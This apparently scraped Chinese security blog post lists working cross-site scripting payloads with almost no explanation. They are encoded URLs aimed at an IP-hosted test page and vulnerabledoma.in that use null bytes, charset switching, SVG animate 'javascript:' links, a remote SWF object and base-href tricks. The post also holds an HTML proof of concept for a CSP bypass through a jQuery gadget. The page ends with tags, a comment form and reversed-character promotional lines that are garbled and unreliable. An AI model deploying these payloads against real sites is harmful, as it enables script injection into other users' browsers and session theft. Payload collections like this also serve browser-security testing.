测试版本:
测试环境:
===============================
http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cbr%3E%00%00%00%00%00%00%00%3Cscript%3Ealert%281%29%3C%2fscript%3E
http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E
https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E
CSP bypass via jQuery Gadget
12345678910111213141516171819
<!DOCTYPE html><html><head><meta http-equiv="content-security-policy" content="script-src 'nonce-random' 'strict-dynamic';"><script nonce=random src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.js"></script><script nonce=random>$(document).ready(function(){ // code taken from http://api.jquery.com/after/ $( ".container" ).after( $( ".child" ) );});</script></head><body>XSS XSS XSS<form class="child"><input name="ownerDocument"/><script>alert(1);</script></form>XSS XSS XSS<p class="container"></p></body></html>
http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E
https://vulnerabledoma.in/xss_auditortest?test=5&q=%3Ca%20href=/**/alert%281%29%3ECLICK%3C/a%3E%3Cbase%20href=%22javascript:%5C
阅读:370468 | 评论:0 | 标签:xss Tor chrome
姓名:
邮箱:
网址:
验证码:
❤用费0款退球星,年1期效有员会
🧠富财控掌,知认升提,长成起一💡